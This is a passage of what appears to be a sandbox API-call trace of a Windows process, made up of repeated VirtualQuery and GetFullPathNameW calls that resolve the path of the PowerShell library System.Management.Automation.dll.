	[0040.308] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.308] GetLastError () returned 0x0
	[0040.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.309] GetLastError () returned 0x0
	[0040.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.309] GetLastError () returned 0x0
	[0040.309] VirtualQuery (in: lpAddress=0x25cca4, lpBuffer=0x25dca4, dwLength=0x1c | out: lpBuffer=0x25dca4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.309] VirtualQuery (in: lpAddress=0x25cce0, lpBuffer=0x25dce0, dwLength=0x1c | out: lpBuffer=0x25dce0*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d698, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.309] GetLastError () returned 0x0
	[0040.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.309] GetLastError () returned 0x0
	[0040.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d648, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.309] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.310] GetLastError () returned 0x0
	[0040.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.311] GetLastError () returned 0x0
	[0040.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.311] GetLastError () returned 0x0
	[0040.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.312] GetLastError () returned 0x0
	[0040.312] VirtualQuery (in: lpAddress=0x25d114, lpBuffer=0x25e114, dwLength=0x1c | out: lpBuffer=0x25e114*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.312] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.313] GetLastError () returned 0x0
	[0040.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.314] GetLastError () returned 0x0
	[0040.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.314] GetLastError () returned 0x0
	[0040.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.314] GetLastError () returned 0x0
	[0040.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.314] GetLastError () returned 0x0
	[0040.314] VirtualQuery (in: lpAddress=0x25d114, lpBuffer=0x25e114, dwLength=0x1c | out: lpBuffer=0x25e114*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.315] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.315] GetLastError () returned 0x0
	[0040.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.316] GetLastError () returned 0x0
	[0040.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.316] GetLastError () returned 0x0
	[0040.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.316] GetLastError () returned 0x0
	[0040.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.316] GetLastError () returned 0x0
	[0040.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.316] GetLastError () returned 0x0
	[0040.316] VirtualQuery (in: lpAddress=0x25d114, lpBuffer=0x25e114, dwLength=0x1c | out: lpBuffer=0x25e114*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25db08, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.316] GetLastError () returned 0x0
	[0040.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.316] GetLastError () returned 0x0
	[0040.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.316] GetLastError () returned 0x0
	[0040.317] VirtualQuery (in: lpAddress=0x25d114, lpBuffer=0x25e114, dwLength=0x1c | out: lpBuffer=0x25e114*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.317] GetLastError () returned 0x0
	[0040.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.317] GetLastError () returned 0x0
	[0040.317] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0040.317] GetLastError () returned 0x0
	[0040.317] VirtualQuery (in: lpAddress=0x25cd44, lpBuffer=0x25dd44, dwLength=0x1c | out: lpBuffer=0x25dd44*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.318] VirtualQuery (in: lpAddress=0x25cd80, lpBuffer=0x25dd80, dwLength=0x1c | out: lpBuffer=0x25dd80*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.318] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.318] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.319] VirtualQuery (in: lpAddress=0x25d048, lpBuffer=0x25e048, dwLength=0x1c | out: lpBuffer=0x25e048*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0040.319] VirtualQuery (in: lpAddress=0x25d084, lpBuffer=0x25e084, dwLength=0x1c | out: lpBuffer=0x25e084*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
